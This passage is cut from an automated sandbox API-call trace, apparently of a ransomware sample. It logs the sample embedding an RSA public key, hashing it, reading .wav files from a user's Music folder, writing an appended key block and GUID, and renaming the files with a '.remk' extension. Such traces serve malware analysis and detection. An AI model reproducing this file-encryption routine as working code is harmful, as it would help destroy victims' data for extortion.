KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.408] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x325fb40 [0234.408] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.408] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.408] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0234.409] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0234.409] CryptHashData (hHash=0x31de170, pbData=0x325fb40, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0234.409] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0234.409] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0234.409] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0234.409] GetLastError () returned 0x0 [0234.410] CryptDestroyHash (hHash=0x31de170) returned 1 [0234.410] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0234.410] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0234.410] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0234.410] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0234.410] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0234.410] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0234.410] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0234.411] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x11c76, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.411] WriteFile (in: hFile=0x640, lpBuffer=0x3192918*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x3192918*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0234.411] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0234.411] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0234.411] CloseHandle (hObject=0x640) returned 1 [0234.418] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e698 [0234.418] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x37b5b70 [0234.418] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Xb4anhaDsw_nEnBFeS\\iGbC-X.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xb4anhadsw_nenbfes\\igbc-x.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Xb4anhaDsw_nEnBFeS\\iGbC-X.wav.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xb4anhadsw_nenbfes\\igbc-x.wav.remk")) returned 1 [0234.419] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ea1fc60, ftCreationTime.dwHighDateTime=0x1d5e814, ftLastAccessTime.dwLowDateTime=0xd008c5c0, ftLastAccessTime.dwHighDateTime=0x1d5da12, ftLastWriteTime.dwLowDateTime=0xd008c5c0, ftLastWriteTime.dwHighDateTime=0x1d5da12, nFileSizeHigh=0x0, nFileSizeLow=0xc2c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="j8VGyPK3jrNNvLRuL67g.wav", cAlternateFileName="J8VGYP~1.WAV")) returned 1 [0234.419] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.419] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa6) returned 0x31a4610 [0234.420] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Xb4anhaDsw_nEnBFeS\\j8VGyPK3jrNNvLRuL67g.wav") returned=".wav" [0234.420] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Xb4anhaDsw_nEnBFeS\\j8VGyPK3jrNNvLRuL67g.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xb4anhadsw_nenbfes\\j8vgypk3jrnnvlrul67g.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0234.421] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=3116) returned 1 [0234.421] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0234.423] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xc06, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.423] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0234.425] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0234.425] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0xc2c, lpOverlapped=0x0) returned 1 [0234.425] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.425] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x325fb40 [0234.425] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.425] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.425] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0234.426] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0234.426] CryptHashData (hHash=0x31de170, pbData=0x325fb40, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0234.426] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0234.426] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0234.426] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0234.426] GetLastError () returned 0x0 [0234.426] CryptDestroyHash (hHash=0x31de170) returned 1 [0234.426] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0234.426] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0234.426] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0234.426] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0234.426] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0234.426] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0234.426] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0234.426] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0234.426] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc30) returned 0x37bc408 [0234.426] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0234.426] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0234.426] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0234.426] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0234.427] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fd48 [0234.427] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0234.427] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37bc350 [0234.427] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee790 [0234.427] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37bc398 [0234.427] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee7a8 [0234.427] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee7d8 [0234.427] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee838 [0234.427] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee7f0 [0234.427] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0234.427] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0234.427] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0234.427] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0234.427] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee7d8 | out: hHeap=0x630000) returned 1 [0234.427] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee7f0 | out: hHeap=0x630000) returned 1 [0234.427] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee838 | out: hHeap=0x630000) returned 1 [0234.427] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0234.427] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0234.427] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee838 [0234.427] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0234.427] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee7f0 [0234.427] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0f28 [0234.427] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31ee7d8 [0234.428] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0234.428] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x3192918 [0234.428] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0234.428] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0234.428] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0234.428] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0234.428] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0234.428] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0234.428] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0234.428] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee7f0 | out: hHeap=0x630000) returned 1 [0234.428] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0234.428] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee7d8 | out: hHeap=0x630000) returned 1 [0234.428] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0234.428] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0234.428] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee838 | out: hHeap=0x630000) returned 1 [0234.428] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0234.428] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0234.428] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0234.428] GetCurrentThreadId () returned 0x314 [0234.428] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0234.428] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c3370 [0234.428] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0234.428] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0234.428] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0234.428] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0234.428] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0234.428] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0234.428] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.429] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.429] GetCurrentThreadId () returned 0x314 [0234.429] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.429] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.429] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x6a7330 [0234.429] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.429] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.429] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.429] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.429] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0234.429] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0234.429] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0234.429] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0234.429] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0234.429] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3195950 [0234.429] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0234.429] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee838 [0234.429] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0234.429] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0234.429] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0234.429] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0234.429] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0234.429] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0234.429] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0234.429] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0234.429] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee7d8 [0234.429] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0234.429] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0234.430] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0234.430] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0234.430] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0234.430] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0234.430] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0234.430] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee7f0 [0234.430] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0234.430] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0234.430] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0234.430] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee7c0 [0234.430] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0234.430] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee850 [0234.430] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0234.430] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0234.430] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0234.430] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee820 [0234.430] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0234.430] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee808 [0234.430] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0234.430] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee868 [0234.430] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee808 | out: hHeap=0x630000) returned 1 [0234.430] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee808 [0234.430] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee820 | out: hHeap=0x630000) returned 1 [0234.430] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed28 [0234.430] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0234.430] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0234.430] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0234.431] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0234.431] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee7d8 | out: hHeap=0x630000) returned 1 [0234.431] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee7d8 [0234.431] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0234.431] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x37c0db8 [0234.431] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee838 | out: hHeap=0x630000) returned 1 [0234.431] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6d60 [0234.431] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee868 | out: hHeap=0x630000) returned 1 [0234.431] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x37c0fc8 [0234.431] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0234.431] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x72aea0 [0234.431] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0234.431] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0234.431] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee7d8 | out: hHeap=0x630000) returned 1 [0234.431] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x37b5b70 [0234.431] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6d60 | out: hHeap=0x630000) returned 1 [0234.431] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x319bc40 [0234.431] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0234.432] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694398 | out: hHeap=0x630000) returned 1 [0234.432] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0234.432] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x319bc40 | out: hHeap=0x630000) returned 1 [0234.432] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 